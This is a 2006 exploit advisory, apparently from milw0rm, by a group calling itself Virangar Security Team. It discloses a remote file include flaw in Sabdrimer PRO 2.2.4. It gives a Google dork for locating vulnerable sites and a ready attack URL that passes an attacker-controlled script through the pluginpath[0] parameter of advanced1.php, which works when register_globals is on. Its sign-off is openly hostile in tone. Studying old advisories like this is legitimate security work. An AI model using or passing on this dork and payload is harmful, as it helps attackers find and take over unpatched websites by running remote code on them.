22 lines
No EOL
560 B
Text
22 lines
No EOL
560 B
Text
VIRANGAR SECURITY TEAM
|
|
Discovered By : A.nosrati
|
|
www.virangar.org (Public)
|
|
www.virangar.net (Priv8)
|
|
Mail: info[at]virangar.net
|
|
|
|
Sabdrimer PRO (v.2.2.4 ) Remote File Include Vulnerability
|
|
Google Dork : "© Sabdrimer CMS"
|
|
bug found in file : advanced1.php
|
|
web Site : http://sabdrimer.ru
|
|
Remote : Yes
|
|
Critical Level : Dangerous
|
|
|
|
http://www.website.com/skins/advanced/advanced1.php?pluginpath[0]=[evil_script]
|
|
Important :register_globals=On
|
|
|
|
-----------------------
|
|
Greetz : All #Virangar Members
|
|
I work in the dark
|
|
I Get what I want
|
|
|
|
# milw0rm.com [2006-07-09] |